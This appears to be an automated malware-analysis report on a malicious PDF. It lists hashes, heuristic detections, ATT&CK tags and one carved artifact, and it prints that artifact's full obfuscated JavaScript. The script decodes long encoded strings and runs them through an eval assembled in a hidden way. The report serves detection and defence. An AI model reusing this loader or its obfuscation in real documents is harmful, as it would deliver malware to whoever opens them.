Malicious PDF — malware analysis report

Static analysis result for SHA-256 40d085716144a9e4…

MALICIOUS

PDF

35.6 KB Authoring application: 204G159G162G204G195G168G207G153G207G144G198G159G198G159G198G159G198G153G198G159G147G198G198G153G147G201G204G159G150G204G198G159G147G198G198G153G153G156G144G201G165G207G147G195G147G198G147G198G150G159G First seen: 2026-05-08
MD5: 66c707d5682778cfd5ed846e09e274e8 SHA-1: 0fd1dbaab169dded9bd8442013dbf578d5699e27 SHA-256: 40d085716144a9e4c1c956c1e113d2eeb47bf86f3201e08331eb044391be737b
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.002 Spearphishing Attachment

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings. The presence of 'javascript_obj0099_000.js' suggests an attempt to execute malicious code. The document body is unreadable, but the overall structure points to a malicious PDF designed to exploit JavaScript execution, likely as a downloader or for further exploitation.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9995

Heuristics 6

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    }
function qwaerasdf(asd){return String.fromCharCode(asd);}
var asdfqwegqwegqewfa="G315G96G180G96G153G144"+"G144G177G96G315G129G129"+"G123G369G327G303G327G333"+"G342G363G273"+"G315G279G96G183G96G"+"324G333G36"+"0G261G312G30"+"3G303G138G345G351G2"+"94G345G348G342G120G144G132"+"G324G333G360G261G312"+"G303G303G138G"+"324G303G330G309G3"+"48G312G96G135G96G1"+"47G96G123G96G129G96G300G2"+"91G321G246G333G"+"348G303G177G375G37"+"5G30G306G35"+"1G330G297G348"+"G315G333G330G96G34"+"5G348G342G285G3"+"42G303G336G303G291G"+"348G96G120G96G315G330G3"+"36G351G348G132G9"+" …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LURE
    PDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0099_000.js pdf-javascript-stream PDF /JS object 99 at offset 0x7FA9 11272 bytes
SHA-256: 575d0bdd008d8572f586a62acebd6d1e2a336885188cd717a7b33f5bd1ab0215
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function rhjahahagk(){
function gqrqewfsdf(str){var set='';var s='';var ee='';
str = sadfjsadkl(str);
str = str.split(",");
for(var i=0;i<str.length;i++){  
ee=str[i]/3;
set+=asdfqwef(ee.toString(16));}
return set;
}
function dsjfassldfhgj(sadsfjkgAD){var jdhjkashfhaui = 0/120+""; return jdhjkashfhaui+sadsfjkgAD;}
function asdfqwef(eds){var set='';var s=eds;
if (s.length<2)
{set=dsjfassldfhgj(s);}
else{set=s;}
return set;
}
function qwaerasdf(asd){return String.fromCharCode(asd);}
var asdfqwegqwegqewfa="G315G96G180G96G153G144"+"G144G177G96G315G129G129"+"G123G369G327G303G327G333"+"G342G363G273"+"G315G279G96G183G96G"+"324G333G36"+"0G261G312G30"+"3G303G138G345G351G2"+"94G345G348G342G120G144G132"+"G324G333G360G261G312"+"G303G303G138G"+"324G303G330G309G3"+"48G312G96G135G96G1"+"47G96G123G96G129G96G300G2"+"91G321G246G333G"+"348G303G177G375G37"+"5G30G306G35"+"1G330G297G348"+"G315G333G330G96G34"+"5G348G342G285G3"+"42G303G336G303G291G"+"348G96G120G96G315G330G3"+"36G351G348G132G9"+"6G297G330G348G96G1"+"23G96G369G30G354G291G"+"342G96G294G351"+"G306G96G183G9"+"6G102G102G177G30G"+"306G333G342G96G120"+"G315G183G144G"+"177G96G315G96G180G96G297G"+"330G348G177G9"+"6G315G129G129G"+"123G369G30G294"+"G351G306G96G12"+"9G183G96G315G330G3"+"36G351G348G177G30G3"+"75G342G303G348G351G"+"342G330G96G294G351G306G17"+"7G375G30G306G351G330"+"G297G348G315G333G3"+"30G96G345G312G303G324G324"+"G297G333G300G303G120G3"+"24G333G291G300G255G"+"342G324G123G369G30G3"+"54G291G342G96G3"+"45G297G333G"+"300G303G96G183G96G"+"102G207G198G147G147"+"G159G198G156G"+"198G153G153G201G17"+"1G162G162G168"+"G147G201G171G144G1"+"44G144G156G168G144G1"+"53G156G144G198G207G156G207G"+"150G210G195G207G19"+"8G144G159G207"+"G168G207G195G210G21"+"0G210G210G2"+"10G210G144G204G159G195"+"G207G159G207"+"G156G207G156G204G1"+"59G150G204G168G144G162G21"+"0G171G159G204G156G162G2"+"10G171G150G207G168G162G2"+"10G171G150G210G168G16"+"2G210G168G195G2"+"07G201G162G210G195G150G201G1"+"56G162G210G204G1"+"50G168G150G204G204G195"+"G201G210G201G171G147G147"+"G162G162G210G195G147"+"G204G168G162"+"G210G198G144G207G147G"+"171G201G207G159G144G207G1"+"62G210G171G162G201G156G20"+"7G159G144G195G198G162"+"G204G159G150G204G"+"195G204G195G"+"159G156G171G207G159G14"+"4G201G204G159G153G21"+"0G207G198G159G195G"+"210G156G204G201G147G162G171G"+"144G207G201G150G159G150"+"G210G207G195G207G159"+"G153G165G195G156G144G210"+"G147G159G204G210G210G1"+"98G171G147G144G153G198G2"+"07G162G210G171G162"+"G201G144G207G159G"+"144G195G168G1"+"50G162G210G207G168G1"+"95G195G162G210G171G162G21"+"0G168G207G159G144G195G162G2"+"10G207G144G162G195G207"+"G159G144G201G156G"+"210G198G210G19"+"8G165G150G165G1"+"98G198G144G"+"201G165G171G147G198G147G"+"198G147G198G144G201G1"+"59G162G147G198G147G198G147"+"G198G144G201G156G17"+"1G147G198G147G1"+"98G147G198G144G"+"201G156G201G14"+"7G198G147G198G147G198G144G"+"201G156G165G147G1"+"98G147G198G147G198G"+"144G201G165G19"+"5G147G198G147G198G14"+"7G198G144G201G165"+"G204G147G198"+"G147G198G147G";
var fdjkghajklsdfhldskhfk="65G144G201"+"G207G144G201G204G147G1"+"47G198G159G198G156"+"G198G147G198G150G147G198"+"G171G15"+"3G144G168G147"+"G198G19"+"8G153G144G1"+"44G147G198G171G153"+"G144G168G147G198G"+"198G153G144G2"+"01G168G150G159G210"+"G207G150G207G156G168"+"G150G195G21"+"0G168G150"+"G162G165G147G210"+"G207G156G171G144G204"+"G162G204G159G150"+"G204G198G171G168G207"+"G207G147G198G159G"+"198G159G198G147G19"+"8G159G198G159G1"+"47G198G198G153G147G"+"144G162G165G147G2"+"01G201G156G171G195G144"+"G150G204G159"+"G150G156G204G1"+"59G150G204"+"G195G156G207G"+"198G159G195"+"G210G144G207G153"+"G204G201G147G162G171G1"+"47G147G153G150G153G207G144"+"G207G153G201G1"+"50G168G150G204G171G"+"204G159G162G204G195G1"+"68G207G153G207G144G198G159G198"+"G159G198G159G198G153G19"+"8G159G147G198G198G153G147"+"G201G204G159G150G204"+"G198G159G147G198"+"G198G153G153G15"+"6G144G201G165G207G14"+"7G195G147G198G147G198G"+"150G159G171G153G195G207G144"+"G153G162G207G168G198G150G15"+"0G210G165G144G162"+"G162G195G1"+"71G156G147G144G20"+"7G210G159G210G204G150G2"+"10G153G171G159G153G210"+"G144G150G162"+"G162G210G165G147"+"G168G162G171G"+"168G165G171G16"+"5G159G204G153G147G207"+"G159G147G204G2"+"10G171G171G198G156G2"+"04G198G168G156G162G150G201G"+"150G210G195G144G207G15"+"0G165G201G195G168"+"G156G195G168G150G168G165G165G"+"153G147G198G147G198G1"+"47G198G147G198G102G96G12"+"9G30G27G324G333G291G300G255G342"+"G324G96G129G96G102G207G156"+"G102G177G30G27G342G303G348G351G34"+"2G330G96G345G297G"+"333G300G303G177G30G375G30G354G"+"291G342G96G324"+"G333G291G300G255G"+"342G32"+"4G195G324G345G333G264G33"+"3G342G303G300"+"G96G183G96G348G312G3"+"15G345G138G315G330G306G3"+"33G138G252G315G348G32"+"4G303G177G30G3"+"54G291G3"+"42G96G345G"+"297G333G300G303G96G183"+"G96G345G312G303G324"+"G324G297G333G300G303G1"+"20G324G333G291G300G255"+"G342G324G195G"+"324G345G33"+"3G264G333G342G303G300G"+"123G177G30G312G303G291G336G24"+"9G336G342G291G363G120G3"+"12G303G360G150G294G315G330G1"+"20G345G297G333G300G303G123G123"+"G177G30G354G29"+"1G342G96G327G345G309G285G294G333G"+"306G96G183"+"G96G345G348G342G285G342G"+"303G336G303G291G34"+"8G120G96G10"+"2G276G351G144G2"+"97G144G297G276G351G14"+"4G297G144G297G"+"102G96G132G96G156G144G171"+"G162G96G123G177G30G348G"+"312G315G345G"+"138G"+"297G333G324G324G29"+"1G294G249G348G333G34"+"2G303G96G183G96G"+"201G333G324G324G291G294G13"+"8G297G333G324G324G303G297G3"+"48G207G327G291G315G"+"324G219G"+"330G306G333G120G369G345"+"G351G294G318G174G102G"+"102G132G327"+"G345G309G174G327G345G309"+"G285G294G333G306"+"G375G123G177G96G30";
var ss="354G291G342G96G213G177G"+"306G351G330G297G348G315"+"G333G330G96G312G30"+"3G360G150G29"+"4G315G330G1"+"20G342G303G345G"+"123G96G369G30G354G2"+"91G342G96G31"+"5G177G30G3"+"54G291G342G96G309G96G183G96G"+"231G291G348G312G138G342G"+"333G351G330G300G120G342G30"+"3G345G138G324G303G330"+"G309G348G312G14"+"1G156G12"+"3G177G30G315G306G"+"96G120G309G96G99G18"+"3G96G120G342G303G3"+"45G138G324G303G330G309G348"+"G312G141G156G123G123"+"G96G342G303G345G"+"96G183G96G342G303G345G96G"+"129G96G102G144G144G102G1"+"77G30G354G291G342G96G3"+"33G351G348G96G183G96G102G10"+"2G177G30G306G333G342"+"G96G120G3"+"15G183G144G177G96G315G18"+"0G342G303G345G138G324G"+"303G330G309G348G312G177G96G31"+"5G129G183G156G123G96"+"G369G30G333G351G3"+"48G96G183G9"+"6G333G351G348G96"+"G129G96G102G111G35"+"1G102G96G129G96G342G303G"+"345G138G345G351G29"+"4G345G348G342G120G315G129"+"G150G132G150G"+"123G96"+"G129G96G342G303G345G"+"138G345G351G294G345G348G34"+"2G120G315G132G150G123G177G"+"30G375G342G303G34"+"8G351G342G330G96G351G330G30"+"3G345G29"+"7G291G336G303G120G333G351"+"G348G123G177"+"G375G30G306G351G330G297G"+"348G315G333G330G96G"+"306G315G360G285G315G348"+"G120G363G2"+"91G342G345"+"G336G132G96G324G3"+"03G330G123G369G30G35"+"7G312G315G324G303G120G3"+"63G291G342G345G"+"336G138G324G303G33"+"0G309G348G3"+"12G96G126G96G"+"150G96G180G96G324G303G3"+"30G123G369G30G"+"363G291G342G345"+"G336G96G129G18"+"3G96G363G291G342G345G336G17"+"7G30G375G342G3"+"03G348G351G342G330"+"G96G363G291"+"G342G345G336G138G345G"+"351G294G345G348G342G315G3"+"30G309G120G144"+"G132G96G324G303G330G"+"96G141G96G150"+"G123G177G375G30G3"+"06G351G330G297G348"+"G315G333G330G96G3"+"12G303G291G336G249G336G342G29"+"1G363G120G345G348G342G12"+"3G369G30G342G33"+"3G348G303G204G291G321G"+"96G183G96G345G348G342"+"G138G324G303G330G309G348G3"+"12G96G126G96G150"+"G177G30G300G291G321G246"+"G333G348G303G18"+"3G96G102G276G351G17"+"1G144G171G1"+"44G102G177G3"+"0G345G336G34"+"2G291G363G96G183G96G30"+"6G315G360G285G3"+"15G348G120G300G"+"291G321G246G"+"333G348G303G132"+"G96G144G360G1"+"50G144G144G144G96G13"+"5G96G342G333G348G30"+"3G204G291G321G123"+"G177G30G324G333G360"+"G261G312G303G30"+"3G96G183G96G345G3"+"48G342G96G129G96G345G336G"+"342G291G363G177"+"G30G324G333G360G"+"261G312G303G303G96G183"+"G96G306G315G360"+"G285G315G348"+"G120G324G33"+"3G360G261G31"+"2G303G303G132G96G1"+"59G150G156G144G171G"+"168G123G177G"+"30G327G303G327"+"G333G342G3"+"63G96G183G96"+"G330G303G3"+"57G96G19"+"5G342G342G291G363G120"+"G123G177G30G3"+"06G333G342G120G315"+"G183G144G177G96";
var podfghiodihisdg="198G144G201G165G1"+"44G147G198G147G198"+"G147G198G168G201G168G16"+"8G204G165G204G162"+"G207G156G168G201G171G165"+"G168G201G168G1"+"47G168G168G198G144G"+"147G198G198G153G147"+"G168G162G204G150G147G144G20"+"1G171G198G147G198G147G"+"198G147G198G144G2"+"01G171G207G147G19"+"8G147G198G147G1"+"98G168G201G168G"+"198G168G195G207G1"+"56G207G156G168G201G"+"171G147G171G162G16"+"8G168G168G171G198G144"+"G147G198G198G"+"153G147G144G162G2"+"04G150G147G144G201G168G147G147G"+"198G147G198G147G198"+"G162G165G150G153G207G144G204G15"+"9G150G204G162G204G14"+"4G147"+"G198G147G198G159G198G159G168G2"+"07G201G201G19"+"8G159G147G198G198G153"+"G147G156G195G147G207G19"+"8G159G195G198G147G2"+"07G156G204G201G14"+"7G162G171G147G147G153G150G"+"153G195G147G207G156"+"G198G168G168G17"+"1G171G165G20"+"1G195G150G153G195G1"+"47G207G144G168G147"+"G171G201G168G1"+"47G207G156G162G204G144G1"+"47G168G150G159G210G207G"+"144G207G156G168G"+"150G195G210G168G"+"150G162G165G147G210G2"+"07G156G207G198"+"G162G144G150G207G207G15"+"6G207G156G207G1"+"56G204G159G150G204G198G1"+"59G198G159G198G147G198G"+"153G198G159G147G1"+"98G198G153G147G20"+"1G162G165G1"+"47G201G207G156G171G147G144G1"+"47G168G20"+"7G207G144G168G201G20"+"7G156G210G156G207G15"+"6G207G156G168G201"+"G207G156G201G156G"+"195G195G20"+"7G156G168G207"+"G207G156G147G198G1"+"98G153G153G144G162"+"G204G150G150G204G"+"159G150G204G198G15"+"9G168G207G198G156G1"+"68G207G207G165"+"G198G159G198G159G168G"+"201G207G156G207G1"+"56G207G156G150G156G1"+"98G147G147G198G198G1"+"53G153G201"+"G162G204G195G153G144G1"+"68G198G14"+"7G162G204G147G147G204G1"+"59G150G204G162G204G147G20"+"1G162G165G144G201G207G144G198G159G198G"+"156G168G201G201G144G210G15"+"6G207G156G207G"+"156G198G147G147G198G"+"171G153G144G168G147G198G"+"198G153G15"+"3G168G207G165G168G198G1"+"47G168G162G165G171G198G1"+"47G168G207G156G171G147"+"G144G162G162G204G147G"+"159G195G204G19"+"5G159G204G204G144G204"+"G171G144G207G201G195G"+"159G162G156G204G159"+"G204G165G204G20"+"4G144G204G171"+"G147G147G165G204G159G150G204G1"+"98G159G198G159G198G159G14"+"7G198G171G153G144G168G1"+"47G198G198G153G144G156G"+"204G159G150G204G162G204"+"G147G201G162G1";
function dec(input2) {var asdf =gqrqewfsdf(input2) ; var asfdsad = hex2a(asdf); return asfdsad;}
function sadfjsadkl(str){return str.replace(/G/g,",");}
function hex2a(hex) {
    var str = '';var zzz=qwaerasdf;
    for (var i = 0; i < hex.length; i += 2){
	var sssss = hex.substr(i,2);
       str +=qwaerasdf('asdfwefwuiegfyuadsui0x'.substr(20,2)+sssss);
}    return str;
}
ss+=asdfqwegqwegqewfa+podfghiodihisdg; 
var dad="";
function adsfquifhiwuf(d,dd){return d+dd;}
ss+=adsfquifhiwuf(fdjkghajklsdfhldskhfk,dad);
var ss=dec(ss);
var czvhjashavsiodhvuipashcpioasdcs  = app.alert["hadsfuihuiahfuhauishzcnxvvjbasbvdiopjiovpasodjviopasconstructorkajdsfhjkasdhfjkhadskjlhvlaksjhdvdsklavh".substring(52,63)];
function asdfeaf(s){if (s==0){return false}else{return true}}
var susea=asdfeaf(1)+"";
var seasus=asdfeaf(0)+"";
var daeaefe="eafadsfjekafhjkavadfefafaef";
var argqrgqadsfwqgwafdsfwef=susea[(3+3)/2];
argqrgqadsfwqgwafdsfwef+=daeaefe[(16+16)/2];
argqrgqadsfwqgwafdsfwef+=seasus[((1+9)/5)-1];
argqrgqadsfwqgwafdsfwef+=seasus[(2+10)/6];
czvhjashavsiodhvuipashcpioasdcs[argqrgqadsfwqgwafdsfwef](ss);
}
rhjahahagk();

Open this report in the interactive analyzer, or submit your own file for analysis.